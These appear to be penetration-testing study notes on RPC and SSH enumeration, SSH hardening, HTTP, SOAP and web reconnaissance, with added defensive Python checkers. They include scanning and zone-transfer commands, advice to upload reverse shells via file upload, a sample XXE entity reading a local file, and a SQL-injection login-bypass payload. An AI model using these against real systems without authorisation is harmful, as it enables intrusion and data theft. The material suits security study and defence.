Allows a client to execute procedures on a remote machine.
NFS is a prominent user of RPC.

RPC service enumeration

RPC Tools: https://resources.oreilly.com/examples/9780596510305/tree/master/tools/rpctools

nmap -sV --script=nfs-* <target_ip>
rpbind -p <target_ip>
rpcinfo -p <target_ip>
rpcclient -I <target_ip>
rpcdump [-p port] <target_ip>

Common RPC services

  • NFS
  • SMB2
  • MSRPC

F9: Secure Shell(SSH)

Identify the types and versions of SSH software in use
Securing SSH
Versions 1 and 2 of the SSH protocol
Authentication mechanisms within SSH

Banner Grabbing

https://github.com/jtesta/ssh-audit
nc -vn <target_IP> 22
ssh-audit.py [-1246pbcnjvlt] <host>

Securing SSH

https://linux.die.net/man/5/sshd_config

Turn off root login

vi /etc/ssh/sshd_config
Change PermitRootLogin to no
PermitRootLogin no
restart SSH server
/etc/init.d/sshd restart

Disable empty passwords

vi /etc/ssh/sshd_config
Change PermitEmptyPasswords to no
PermitEmptyPasswords no

Turn off password login

vi /etc/ssh/sshd_config
Change PasswordAuthentication to no
PasswordAuthentication no

This will mean that we have to login using a private key file.
If the key is leaked, change it immediately.

Limit the number of authentication attempts per connection

vi /etc/ssh/sshd_config
MaxAuthTries 3

MaxAuthTries
Specifies the maximum number of authentication attempts permitted per connection. Once the number of failures reaches half this value, additional failures are logged. The default is 6.
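The four settings above can be checked against a real sshd_config rather than by eye. As an added example, not from the notes and not OpenSSH's own code, the following reads the global section of an sshd_config and reports which recommended settings are missing or weak. It follows the rule that matters most here: sshd uses the first value it sees for a keyword, so a hardening line appended at the end of the file does nothing if the keyword appears earlier. The sample configs are constructed, the defaults are the documented sshd_config(5) ones for a modern OpenSSH, and the wanted values are the notes' recommendations.

```python
"""Added example: audit the global section of sshd_config against the
recommended PermitRootLogin / PasswordAuthentication /
PermitEmptyPasswords / MaxAuthTries settings."""

import re

# sshd_config(5) defaults for modern OpenSSH, used when a keyword is unset.
DEFAULTS = {
    "permitrootlogin": "prohibit-password",
    "passwordauthentication": "yes",
    "permitemptypasswords": "no",
    "maxauthtries": "6",
}

# Assumption: the baseline is the notes' recommendations.
WANTED = {
    "permitrootlogin": "no",
    "passwordauthentication": "no",
    "permitemptypasswords": "no",
}
MAX_AUTH_TRIES = 3

# keyword, then either whitespace or an optional '=' separator, then value
KEYWORD_RE = re.compile(r"^([A-Za-z][A-Za-z0-9]*)(?:\s*=\s*|\s+)(.*?)\s*$")

# Constructed sample: weak settings, and a late "fix" that sshd ignores.
SAMPLE_WEAK = """\
# constructed sample sshd_config
Port 22
#PermitRootLogin prohibit-password
PermitRootLogin yes
PasswordAuthentication yes
PermitEmptyPasswords no
MaxAuthTries 10
# too late: the first value above wins
PermitRootLogin no
Match User deploy
    PasswordAuthentication no
"""

SAMPLE_HARDENED = """\
PermitRootLogin no
PasswordAuthentication no
PermitEmptyPasswords no
MaxAuthTries 3
"""


def effective_settings(text):
    """Keyword -> value for the global section (everything before the first
    Match block), keeping the first occurrence as sshd does."""
    settings = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        m = KEYWORD_RE.match(line)
        if not m:
            continue
        key, value = m.group(1).lower(), m.group(2)
        if key == "match":
            break  # per-user/host overrides are out of scope here
        settings.setdefault(key, value)
    return settings


def audit_sshd_config(text):
    """Return a list of human-readable findings; empty means compliant."""
    settings = effective_settings(text)
    findings = []
    for key, wanted in WANTED.items():
        actual = settings.get(key, DEFAULTS[key])
        if actual.lower() != wanted:
            findings.append(f"{key}: is '{actual}', want '{wanted}'")
    tries = int(settings.get("maxauthtries", DEFAULTS["maxauthtries"]))
    if tries > MAX_AUTH_TRIES:
        findings.append(f"maxauthtries: is {tries}, want at most {MAX_AUTH_TRIES}")
    return findings


if __name__ == "__main__":
    for finding in audit_sshd_config(SAMPLE_WEAK):
        print(finding)
```

An empty config is not safe either: with nothing set, the defaults leave password logins on and MaxAuthTries at 6, so the audit of an empty file still reports three findings.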

Protection tools

https://www.sshguard.net/
https://www.fail2ban.org/wiki/index.php/Main_Page

These are log monitoring and response tools.

Changing port number?

While we can change the SSH port to something like port 9999 (where the default is port 22), it is still weak to targeted attacks.

Tools like shodan can scan for port 22 services on the internet.

However, security via obscurity is not reliable and largely discouraged.

Appendix G: Web Technologies

G1: Web Server Operations

How a web server functions in terms of the client/server architecture.
Concepts of virtual hosting and web proxies.

Traditional Web application

  1. Web server
  2. Database server

The client sends HTTP requests to the web server; the server returns a full web page after pulling and processing data from static files or the database.

Install your own server:
https://www.apachefriends.org/index.html

Famous Stacks:
Linux, Apache, MySQL, PHP, Perl (LAMPP)

Modern Apps and Single Page Applications

Splits backend and frontend.

Frontend talks to backend via asynchronous javascript HTTP requests.
https://developer.mozilla.org/en-US/docs/Web/API/XMLHttpRequest/Synchronous_and_Asynchronous_Requests

A simple view of this is as follows. When we navigate to a new PHP page, the browser requests a totally new page, and data has to be passed to the new page.

Single Page Applications will switch the whole page within the browser to some other content, without having to load new page from browser. The new content could be pre-loaded, or taken via javascript from a backend server to serve the content.

The above is a simplistic rundown of web technologies.
Further reading is required.
https://archive.uneca.org/sites/default/files/uploaded-documents/SROs/SA/GIS-SP2018/introduction_to_web_technology.pdf
https://developer.mozilla.org/en-US/docs/Learn/Common_questions/What_is_a_web_server

Virtual Hosting

Traditionally, websites are hosted on computers within an office environment, where the office owns the physical hardware connected to the internet and is responsible for hardware maintenance and such.

Virtual Hosting is where we can "split" the computer in a way that lets us host multiple websites or subdomains on it.
https://en.wikipedia.org/wiki/Virtual_hosting

We will likely see this in cheap shared hosting services such as GoDaddy.

Web Proxies

https://en.wikipedia.org/wiki/Proxy_server

Client -> Proxy Server -> web server

The proxy server sits in between the client and the web server. It can serve functions such as monitoring and filtering, firewalling, load balancing etc.

In pentesting, we may use a proxy server to observe and reproduce the behaviour of the client and server, so that we can accurately retrieve data.

G2: Web Servers and their flaws

Common web servers and their fundamental differences and vulnerabilities associated with them:
• IIS
• Apache (and variants)

Internet Information Services (IIS)

Windows web service.
Runs with .asp, .aspx extensions
Depends on web.config file

If we have unrestricted file upload capabilities, we can upload .asp, .aspx files to run reverse shells or other payloads.

If web.config is viewable, there may be credentials in it for us to exploit. If we can change the web.config, we may also use it to achieve code execution.

Apache

On its own, vulnerabilities in the server are usually due to misconfigurations.
e.g. HTTP PUT/COPY methods.

APACHE is often packaged together with PHP. Most vulnerabilities will be found as application vulnerabilities rather than Apache vulnerabilities.

Apache TOMCAT (.jsp)

The host manager page is vulnerable to WAR file upload.
Uses the .jsp file extension.

Vulnerabilities in the servers are usually due to misconfigurations.
e.g. HTTP PUT/COPY methods.

G3: Web Enterprise Architecture

Design of tiered architectures.
The concepts of logical and physical separation.
Differences between presentation, application and database layers.

https://www.ibm.com/sg-en/cloud/learn/three-tier-architecture

Each tier is run on separate infrastructure. Instead of a LAMPP stack on one computer only, we can split frontend, backend, and database into 3 servers.

Presentation Tier (aka frontend)

HTML/CSS and JS for communicating with other services.

Application Tier

Commonly using REST, RESTFUL or SOAP APIs, this is the back end where data processing occurs.

Database Tier

For storing and retrieving data.

The concepts of logical and physical separation.

A simplistic view is that "logical" means by software. For example, the LAMPP stack has all 3 services running on the same machine.

A simplistic view is that "physical" means by hardware. For example, we have 3 servers running front,back and database layers.

Implications:
Load balancing - The infrastructure is more reliable. On a single-machine stack, if the frontend gets a large number of queries and slows down or crashes, all 3 services go down with it.

On a multi-tier architecture, if the frontend is heavy and slow, we may be able to spin up another instance of the frontend to lessen the load, whilst not touching the backend or databases.

Another implication is that if the frontend is hacked, the data is "safe", as it is elsewhere, granted that credentials are not leaked. This may give incident responders time to react and take action.

G4: Web Protocols

Web protocols: HTTP, HTTPS, SOAP.
All HTTP web methods and response codes.
HTTP Header Fields relating to security features

Hypertext Transfer Protocol (HTTP)

https://en.wikipedia.org/wiki/Hypertext_Transfer_Protocol

Request-Response model.
Browser sends requests -> Server responds with data -> Browser shows data on screen for users

HTTP Requests

HTTP Request Header

Methods are a way for HTTP to send and receive data, and may have specific functions.
Servers may filter requests using any of the information here.

Sample request header:

GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE5.01; Windows NT)
Host: www.google.com
Accept-Language: en-us
Accept-Encoding: gzip, deflate
Cookie: PHPSession=d2hhdGV2ZXJtYW50aGlzaXNhbWF6aW5nanVzdGFzYW1wbGVjb29raWU=; username=iamhero
Connection: Keep-Alive

Method - GET. / is the path of the home page.
User-Agent: this is what the browser is using. Can be spoofed. Servers may filter requests using this.
Host is the web domain (the host part of the URL).
Cookie is where data is stored for any number of applications like shopping cart, analytics etc.

Reading:
https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers

HTTP Request BODY

A blank line after the headers marks the start of the BODY. This is where form data goes, or any other data that you want to send over to the server.

HTTP METHODS

https://developer.mozilla.org/en-US/docs/Web/HTTP/Methods
Extract from Mozilla, Methods

HTTP defines a set of request methods to indicate the desired action to be performed for a given resource. Although they can also be nouns, these request methods are sometimes referred to as HTTP verbs. Each of them implements a different semantic, but some common features are shared by a group of them: e.g. a request method can be safe, idempotent, or cacheable.

GET
The GET method requests a representation of the specified resource. Requests using GET should only retrieve data.

HEAD
The HEAD method asks for a response identical to that of a GET request, but without the response body.

POST
The POST method is used to submit an entity to the specified resource, often causing a change in state or side effects on the server.

PUT
The PUT method replaces all current representations of the target resource with the request payload.

DELETE
The DELETE method deletes the specified resource.

CONNECT
The CONNECT method establishes a tunnel to the server identified by the target resource.

OPTIONS
The OPTIONS method is used to describe the communication options for the target resource.

TRACE
The TRACE method performs a message loop-back test along the path to the target resource.

PATCH
The PATCH method is used to apply partial modifications to a resource.

Usage:
GET - Static web pages. Just sends HTML data or API data over. Data is transmitted in URL parameters.
POST - Usually used with forms. Data is sent in the request BODY.

There are other methods like COPY.

Dangerous Methods:
PUT/COPY - If we can put files, we achieve file upload. And if it is unrestricted file upload, it can be an entrypoint into the server.
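Request line, headers, blank line, body, and a method allow-list are the pieces a server or filtering proxy works with. As an added example (not from the notes), the following parses a raw HTTP/1.1 request into those parts and gives a verdict on the method, refusing PUT/COPY-style requests before they reach the application. The GET request is the notes' own sample rebuilt with CRLF line endings (cookie pair written as name=value); the PUT request and the allowed-method set are constructed assumptions for the example.

```python
"""Added example: parse a raw HTTP/1.1 request and apply a method
allow-list, the way a server or filtering proxy would."""

# The sample request from the notes, with CRLF line endings.
SAMPLE_REQUEST = (
    "GET / HTTP/1.1\r\n"
    "User-Agent: Mozilla/4.0 (compatible; MSIE5.01; Windows NT)\r\n"
    "Host: www.google.com\r\n"
    "Accept-Language: en-us\r\n"
    "Accept-Encoding: gzip, deflate\r\n"
    "Cookie: PHPSession=d2hhdGV2ZXJtYW50aGlzaXNhbWF6aW5nanVzdGFzYW1wbGVjb29raWU=; username=iamhero\r\n"
    "Connection: Keep-Alive\r\n"
    "\r\n"
)

# Constructed request of the kind a dangerous-method filter should stop.
SAMPLE_PUT = (
    "PUT /uploads/note.txt HTTP/1.1\r\n"
    "Host: www.example.test\r\n"
    "Content-Length: 5\r\n"
    "\r\n"
    "hello"
)

SAFE_METHODS = {"GET", "HEAD", "OPTIONS"}
# Assumption: this application only needs the safe methods plus POST.
ALLOWED_METHODS = SAFE_METHODS | {"POST"}


def parse_request(raw):
    """Split a raw request into method, target, version, headers
    (names lower-cased, since header names are case-insensitive),
    cookies and body."""
    head, _, body = raw.partition("\r\n\r\n")  # the blank line ends the headers
    lines = head.split("\r\n")
    method, target, version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    cookies = {}
    for pair in headers.get("cookie", "").split(";"):
        if "=" in pair:
            key, value = pair.strip().split("=", 1)
            cookies[key] = value
    return {"method": method, "target": target, "version": version,
            "headers": headers, "cookies": cookies, "body": body}


def method_verdict(request, allowed=ALLOWED_METHODS):
    """'allow', or the status line a filter would answer with."""
    method = request["method"]
    if method not in allowed:
        return f"405 Method Not Allowed: {method}"
    if request["version"] == "HTTP/1.1" and "host" not in request["headers"]:
        return "400 Bad Request: Host header is required in HTTP/1.1"
    return "allow"


if __name__ == "__main__":
    for raw in (SAMPLE_REQUEST, SAMPLE_PUT):
        req = parse_request(raw)
        print(req["method"], req["target"], "->", method_verdict(req))
```

Rejecting by allow-list rather than by a list of known-bad verbs is the safer default: COPY, MOVE and other WebDAV methods are then refused without having to enumerate them.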

Hypertext Transfer Protocol Secure (HTTPS)

https://en.wikipedia.org/wiki/HTTPS

Uses Public-Key Cryptography to secure information.
Commonly using RSA for cryptography.

SSL/TLS

The latest TLS version is TLS 1.3.

Heartbleed OpenSSL exploit

https://heartbleed.com/
Leakage of server memory through HTTPS services that use a vulnerable OpenSSL.

What is being leaked?

Encryption is used to protect secrets that may harm your privacy or security if they leak. In order to coordinate recovery from this bug we have classified the compromised secrets into four categories: 1) primary key material, 2) secondary key material, 3) protected content and 4) collateral.

What versions of the OpenSSL are affected?

Status of different versions:

OpenSSL 1.0.1 through 1.0.1f (inclusive) are vulnerable
OpenSSL 1.0.1g is NOT vulnerable
OpenSSL 1.0.0 branch is NOT vulnerable
OpenSSL 0.9.8 branch is NOT vulnerable

If during your scanning you see OpenSSL 1.0.1x, you may try Heartbleed exploits to see what leaked information you can find.

Simple Object Access Protocol (SOAP)

Sends messages with XML format.
Since it takes XML data, SOAP APIs may be vulnerable to XML external entity injection(XXE) attacks.
Source: https://en.wikipedia.org/wiki/SOAP

POST /InStock HTTP/1.1
Host: www.example.org
Content-Type: application/soap+xml; charset=utf-8
Content-Length: 299
SOAPAction: "http://www.w3.org/2003/05/soap-envelope"

<?xml version="1.0"?>
<soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope" xmlns:m="http://www.example.org">
  <soap:Header>
  </soap:Header>
  <soap:Body>
    <m:GetStockPrice>
      <m:StockName>T</m:StockName>
    </m:GetStockPrice>
  </soap:Body>
</soap:Envelope>
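Because SOAP carries XML, the server's parser is the XXE attack surface. As an added example (not from the notes and not from any SOAP library), the following extracts the operation and its parameters from the envelope above while refusing any document that carries a DOCTYPE or ENTITY declaration, which is the simplest way to shut out external entity and entity-expansion tricks using only the standard library. The hostile envelope is a constructed illustration; the substring check is a deliberately simple approach (a hardened parser such as defusedxml does the same job more thoroughly).

```python
"""Added example: parse a SOAP 1.2 envelope safely by refusing DTDs
before the XML parser ever sees them."""

import xml.etree.ElementTree as ET

SOAP_NS = "http://www.w3.org/2003/05/soap-envelope"

# The envelope from the notes, inlined as a string.
SAMPLE_ENVELOPE = """<?xml version="1.0"?>
<soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope" xmlns:m="http://www.example.org">
  <soap:Header>
  </soap:Header>
  <soap:Body>
    <m:GetStockPrice>
      <m:StockName>T</m:StockName>
    </m:GetStockPrice>
  </soap:Body>
</soap:Envelope>"""

# Constructed hostile envelope: declares an external entity and references
# it from a parameter. A parser that resolves entities would read the file.
HOSTILE_ENVELOPE = """<?xml version="1.0"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/hostname"> ]>
<soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope" xmlns:m="http://www.example.org">
  <soap:Body>
    <m:GetStockPrice>
      <m:StockName>&xxe;</m:StockName>
    </m:GetStockPrice>
  </soap:Body>
</soap:Envelope>"""


def local_name(tag):
    """Strip the {namespace} prefix ElementTree puts on tag names."""
    return tag.rsplit("}", 1)[-1]


def parse_soap_call(xml_text):
    """Return {operation: {parameter: value}} from the SOAP Body.
    Raises ValueError for any document carrying a DTD, and for an
    envelope without a Body."""
    text = xml_text.lstrip()  # the XML declaration must be first
    if "<!DOCTYPE" in text or "<!ENTITY" in text:
        raise ValueError("DTD in SOAP request rejected")
    root = ET.fromstring(text)
    body = root.find(f"{{{SOAP_NS}}}Body")
    if body is None:
        raise ValueError("no SOAP Body")
    return {local_name(op.tag): {local_name(p.tag): (p.text or "").strip() for p in op}
            for op in body}


def is_rejected(xml_text):
    """True when parse_soap_call refuses the document."""
    try:
        parse_soap_call(xml_text)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    print(parse_soap_call(SAMPLE_ENVELOPE))
    print("hostile rejected:", is_rejected(HOSTILE_ENVELOPE))
```

A legitimate SOAP request has no need for a DTD, so rejecting it outright costs nothing and also removes the internal-entity "billion laughs" expansion case.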

HTTP Response codes

When an HTTP server sends a response, it carries a response code that indicates the success or failure of an operation.
https://developer.mozilla.org/en-US/docs/Web/HTTP/Status

HTTP response status codes indicate whether a specific HTTP request has been successfully completed. Responses are grouped in five classes:

Informational responses (100–199)
Successful responses (200–299)
Redirects (300–399)
Client errors (400–499)
Server errors (500–599)

Common response codes:
200 OK. Indicates success and no issues
301 Moved Permanently - permanent redirect, e.g. test.com/help redirects to test.com/faq
401 Unauthorized
403 Forbidden
404 Not Found - Page not found.
500 Internal Server error
502 Bad Gateway - Likely when server not set up properly.

Refer to https://developer.mozilla.org/en-US/docs/Web/HTTP/Status for full list and details.

HTTP Header Fields relating to security features

https://infosec.mozilla.org/guidelines/web_security
Source: https://www.netsparker.com/blog/web-security/http-security-headers/

Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
Content-Security-Policy: default-src 'self'
X-Frame-Options: deny

Deprecated ones

X-XSS-Protection: 1; mode=block
Public-Key-Pins:
    pin-sha256="cUPcTAZWKaASuYWhhneDttWpY3oBAkE3h2+soZS7sWs="; 
    max-age=5184000

Other useful headers

Expect-CT: max-age=86400, enforce, 
    report-uri="https://example.com/report"
X-Content-Type-Options: nosniff
Referrer-Policy: origin-when-cross-origin
Cache-Control: no-store
Clear-Site-Data: "*"
Feature-Policy: microphone 'none'; camera 'none'

Refer here for more details
https://www.netsparker.com/blog/web-security/http-security-headers/
https://infosec.mozilla.org/guidelines/web_security#web-security-cheat-sheet
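The header lists above can be turned into a check. As an added example (not from the notes, Netsparker or Mozilla), the following audits a set of response headers: it reports the recommended headers that are missing, the deprecated ones still being sent, and a few weak values (a short HSTS max-age, a CSP that allows unsafe-inline, an unexpected X-Frame-Options value). The sample responses are constructed, and the 180-day minimum HSTS age is this example's baseline, an assumption rather than a standard.

```python
"""Added example: audit HTTP response headers against the recommended,
deprecated and weak-value cases listed in the notes."""

REQUIRED = {
    "strict-transport-security",
    "content-security-policy",
    "x-frame-options",
    "x-content-type-options",
    "referrer-policy",
}
DEPRECATED = {"x-xss-protection", "public-key-pins"}
MIN_HSTS_AGE = 15552000  # 180 days; assumption: this example's baseline

# Constructed sample: a response that sends some headers, some of them weak.
SAMPLE_HEADERS = {
    "Content-Type": "text/html; charset=utf-8",
    "Strict-Transport-Security": "max-age=300",
    "Content-Security-Policy": "default-src 'self' 'unsafe-inline'",
    "X-XSS-Protection": "1; mode=block",
    "X-Content-Type-Options": "nosniff",
}

# Constructed sample using the values recommended above.
HARDENED_HEADERS = {
    "Strict-Transport-Security": "max-age=63072000; includeSubDomains; preload",
    "Content-Security-Policy": "default-src 'self'",
    "X-Frame-Options": "deny",
    "X-Content-Type-Options": "nosniff",
    "Referrer-Policy": "origin-when-cross-origin",
}


def audit_headers(headers):
    """Return a list of findings; an empty list means nothing to report."""
    h = {k.lower(): v for k, v in headers.items()}  # names are case-insensitive
    findings = []
    for name in sorted(REQUIRED - set(h)):
        findings.append(f"missing: {name}")
    for name in sorted(DEPRECATED & set(h)):
        findings.append(f"deprecated header still sent: {name}")

    hsts = h.get("strict-transport-security")
    if hsts:
        directives = [d.strip().lower() for d in hsts.split(";")]
        age = next((int(d.split("=", 1)[1]) for d in directives
                    if d.startswith("max-age=")), 0)
        if age < MIN_HSTS_AGE:
            findings.append(f"weak: strict-transport-security max-age={age} below {MIN_HSTS_AGE}")
        if "includesubdomains" not in directives:
            findings.append("weak: strict-transport-security lacks includeSubDomains")

    csp = h.get("content-security-policy", "")
    if "'unsafe-inline'" in csp or "'unsafe-eval'" in csp:
        findings.append("weak: content-security-policy allows unsafe-inline/unsafe-eval")

    xfo = h.get("x-frame-options", "").lower()
    if xfo and xfo not in ("deny", "sameorigin"):
        findings.append(f"weak: x-frame-options value '{xfo}'")
    return findings


if __name__ == "__main__":
    for finding in audit_headers(SAMPLE_HEADERS):
        print(finding)
    print("hardened findings:", audit_headers(HARDENED_HEADERS))
```

Run against captured response headers from a test instance, this gives the same list a scanner would, and the hardened set (the notes' own three headers plus nosniff and a Referrer-Policy) comes back clean.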

G5: Web Markup Languages

HyperText Markup Language (HTML)
In popular use now as web GUI language.
HTML/CSS/JS

Extensible Markup Language (XML)
Not so popular for transmitting data any more, but we may still find services using it, such as SOAP.
Also used as config file storage in web servers, etc.

G6: Web programming Languages

Common web programming languages: JSP, ASP, PHP, CGI based Perl and JavaScript.

| Language | Description |
| --- | --- |
| Jakarta Server Pages (JSP) | Used in Tomcat servers. .jsp, .jspx |
| Active Server Pages (ASP) | Common in Microsoft .NET frameworks and IIS. .asp, .aspx |
| PHP: Hypertext Preprocessor | Commonly used language. The WordPress blog framework uses PHP. .php |
| Common Gateway Interface (CGI) | A set of protocols to communicate with an HTTP server. Python and Perl based CGI exist. |
| JavaScript (JS) | Popular with Single Page Applications. Refer to NodeJS and the Express server; ReactJS and AngularJS. |
| Python | Django, Flask frameworks available |
| Ruby | Ruby on Rails framework |
| Rust | rocket.rs |
| C++ | TreeFrog framework |

A language is just a language. Almost every language has its own web support or framework.

Frontend: HTML/CSS/JS
The above list is common for the data processing aspect, and thus for backend.

G7 Web Application Server Vulnerabilities

Vulnerabilities in common application frameworks, servers and technologies: .NET, J2EE, Coldfusion, Ruby on Rails and AJAX.

The OWASP Top 10 web vulnerabilities affect all websites, frameworks and applications. It is better to talk about common web vulnerabilities than about server-specific vulnerabilities.

Not all servers have "common" vulnerabilities, or rather, the classification of "common" is difficult. Vulnerabilities often depend on patch levels, versions, dependencies etc.

| Technology | Web vulnerabilities |
| --- | --- |
| .NET | web.config exposure is common. |
| J2EE | https://owasp.org/www-pdf-archive/OWASP_NL_Top_Ten_Web_Application_Vulnerabilities_in_J2EE.pdf. Not many known vulnerabilities are found in ExploitDB; one example is SAP NetWeaver J2EE Engine 7.40 - SQL Injection. |
| ColdFusion | ColdFusion 8, 9 and 10 have multiple vulnerabilities such as remote code execution, authentication bypass, cross-site scripting etc. |
| Ruby on Rails | Has had remote code execution, file disclosure etc. |
| AJAX | There isn't a web server called AJAX; it is a technique for asynchronous communication with backend servers. |

G8: Web APIs

Application interfaces: CGI, ISAPI filters and Apache modules.
| Item | Description |
| --- | --- |
| Common Gateway Interface(CGI) | A set of protocols to communicate with HTTP server. Has Python, Perl based CGI. Enumerate cgi-bin path to find hidden scripts. |
| ISAPI | Used in Windows IIS. DLL files that can run data processing. https://docs.microsoft.com/en-us/previous-versions/iis/6.0-sdk/ms524610(v=vs.90) |
| Apache | https://httpd.apache.org/docs/2.4/mod/ |
| representational state transfer, REST or RESTful API | MODERN and COMMON API. Uses HTTP req and res. https://www.redhat.com/en/topics/api/what-is-a-rest-api. Full name is "representational state transfer" |

REST API is most common for backend work in the context of 2021.
There are also JAVA frameworks like Spring to consider.
https://developer.mozilla.org/en-US/docs/Learn/Server-side/First_steps/Web_frameworks

G9: Web Subcomponents

Web architecture sub-components: Thin/Thick web clients, servlets and applets, Active X.
Flash Application Testing
.Net Thick Clients
Java Applets
Decompilation of client-side code

Thin vs Thick Clients

https://medium.com/@mouna.mallipeddi/thin-client-vs-thick-client-69d90c13d02d
A technical/computing term, not a web term. May refer to software or hardware.
Thin - a barebones device/app that needs to connect to external resources.
Thick - self-sufficient, self-contained, e.g. a LAMPP stack where everything is on one device and we can launch locally without internet. Also used when there is a need for offline usage.

Servlets

A servlet is a small Java program that runs within a Web server.

Execution of a servlet involves six basic steps:

1. The client sends the request to the web server.
2. The web server receives the request.
3. The web server passes the request to the corresponding servlet.
4. The servlet processes the request and generates the response in the form of output.
5. The servlet sends the response back to the web server.
6. The web server sends the response back to the client, and the client browser displays it on the screen.
Source: https://www.geeksforgeeks.org/introduction-java-servlets/

Applets

An applet is a program written in the Java programming language that can be included in an HTML page, much in the same way an image is included in a page.

Applet vs Servlet

https://www.geeksforgeeks.org/difference-between-applets-and-servlets/

| Applet | Servlet |
| --- | --- |
| Applets are used to provide interactive features to web applications that cannot be provided by HTML alone, like capturing mouse input. Frontend. | Backend processing. Similar to PHP, ASP.NET. |

ActiveX

https://en.wikipedia.org/wiki/ActiveX
Created by Microsoft for Internet Explorer.
Still available in Internet Explorer 11, but not in the new Microsoft Edge.

Provides frontend media interactions and functionalities, like plugins.

Flash Application Testing

Flash has been deprecated and is no longer in use.
https://en.wikipedia.org/wiki/Adobe_Flash
Flash Player was deprecated in 2017 and officially discontinued at the end of 2020.

Flash was used to create and display media for the web. Flash games were famously popular in their time.

Flash Application Testing probably will not come up in today's context. If there is, then feel free to search for it in ExploitDB.

.Net Thick Clients

https://www.cyberark.com/resources/threat-research-blog/thick-client-penetration-testing-methodology

Author's Note: Thin and Thick clients seem to often refer to hardware devices. Thin client devices do not even have their own OS. Not sure what Thin and Thick would mean in a .Net or web context. The Cyberark article classifies Multitier Architecture as Thick client.

Appendix H: Web Testing Methodologies

H1: Web Application Reconnaissance

Benefits of performing application reconnaissance.
Discovering the structure of web applications.
Methods to identify the use of application components defined in G1 to G9.

Benefits

Gives clear view of possible attack vectors.

Enumeration (Discovery)

General enumeration

Scan all ports. There may be more applications on other ports.

nmap -p- <target_ip>

Request Analysis

  • Burpsuite
  • OWASP ZAP. Do not use ZAP in OSCP exams.
  • POSTMAN - Good for API development. Good to use for sending manual requests.

Mastery of Burpsuite is recommended.

Path/Directory discovery

  • Dirbuster - https://tools.kali.org/web-applications/dirbuster
  • Gobuster - https://github.com/OJ/gobuster
  • WFUZZ - https://tools.kali.org/web-applications/wfuzz

Subdomain discovery - DNS zone transfer

If DNS on port 53 is open, it is worth trying a DNS zone transfer to find subdomain information, or other domain information.

dig axfr @<DNS_IP>
dig axfr @<DNS_IP> <DOMAIN>

If a zone transfer is not allowed, fuzz for subdomains. See directory discovery.

Gobuster modes:
Available Modes
dir - the classic directory brute-forcing mode
dns - DNS subdomain brute-forcing mode
s3 - Enumerate open S3 buckets and look for existence and bucket listings
vhost - virtual host brute-forcing mode (not the same as DNS!)
Source: https://zweilosec.gitbook.io/hackers-rest/web/web-notes/subdomain-virtual-host-enumeration

H2: Threat Modelling and Attack Vectors

Simple threat modelling based on customer perception of risk.
Relate functionality offered by the application to potential attack vectors.

H3: Information gathering from Web Markup

Examples of the type of information available in web page source that may prove useful to an attacker:
• Hidden Form Fields
• Database Connection Strings
• Credentials
• Developer Comments
• Other included files
• Authenticated-only URLs

Use "View Page Source"
Use Developer Tools in browser
- inspect element
- network tab - see what resources are loaded
- storage - for cookie scanning

H4: Authentication Mechanisms ( Signups and logins )

Common pitfalls associated with the design and implementation of application authentication mechanisms.

Data flow for authentication:
1. user fills in form
2. Form submitted over POST
3. Username and Password compared to what is saved in databases. (Passwords are usually Hashed)
4. returns data to user's browser

Common pitfalls:
- Inputs not sanitised. HTML special characters need to be escaped on both the frontend and the backend; once inputs are sanitised, the risk of SQL injection and cross-site scripting attacks is largely reduced. See the section on "Input Validation".
- Credentials hidden in the form values. Insecure.
- Prepared statements must be used to protect against SQL injection. https://www.w3schools.com/php/php_mysql_prepared_statements.asp
- Credentials saved as plaintext.
- Using weak encryption.
- Basic Authentication uses Base64 encoding to carry the credentials in the Authorization header. If the encoded credentials are leaked, it is trivial to recover the actual username and password from them.
- Password reuse.
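To make the prepared-statement and plaintext-credential pitfalls concrete, here is an added Python example (not from these notes or from any project they cite) built on the standard library sqlite3 module: a login check assembled by string formatting, beside one that uses a parameterised query and a salted PBKDF2 hash. The user name, password and table layout are constructed for the demo; the vulnerable path keeps a plaintext password column only so that both pitfalls can be shown side by side.

```python
import hashlib
import hmac
import os
import sqlite3

# Constructed demo account, not from the notes.
DEMO_USER = "alice"
DEMO_PASSWORD = "correct horse battery staple"


def hash_password(password: str, salt: bytes) -> bytes:
    """Salted PBKDF2-HMAC-SHA256; the salt is stored next to the hash."""
    return hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, 100_000)


def build_demo_db() -> sqlite3.Connection:
    """In-memory SQLite users table with a plaintext column (used only by the
    vulnerable path) and a salt + hash pair (used by the hardened path)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT UNIQUE,"
        " password TEXT, salt BLOB, pw_hash BLOB)"
    )
    salt = os.urandom(16)
    conn.execute(
        "INSERT INTO users (username, password, salt, pw_hash) VALUES (?, ?, ?, ?)",
        (DEMO_USER, DEMO_PASSWORD, salt, hash_password(DEMO_PASSWORD, salt)),
    )
    conn.commit()
    return conn


def vulnerable_login(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Two pitfalls at once: the password is compared in plaintext, and the
    statement is built by string formatting, so user input becomes part of
    the SQL grammar instead of being treated as data."""
    query = (
        f"SELECT id FROM users WHERE username = '{username}' "
        f"AND password = '{password}'"
    )
    return conn.execute(query).fetchone() is not None


def safe_login(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Prepared statement (? placeholder) plus a constant-time comparison of
    the salted hash. The username is bound as a parameter and can never
    change the shape of the query."""
    row = conn.execute(
        "SELECT salt, pw_hash FROM users WHERE username = ?", (username,)
    ).fetchone()
    if row is None:
        return False
    salt, stored_hash = row
    return hmac.compare_digest(stored_hash, hash_password(password, salt))


if __name__ == "__main__":
    db = build_demo_db()
    # A classic comment-out payload in the username field (constructed input).
    injected_user = "' OR '1'='1' --"
    print("vulnerable login, injected username:", vulnerable_login(db, injected_user, "wrong"))
    print("safe login, injected username:      ", safe_login(db, injected_user, "wrong"))
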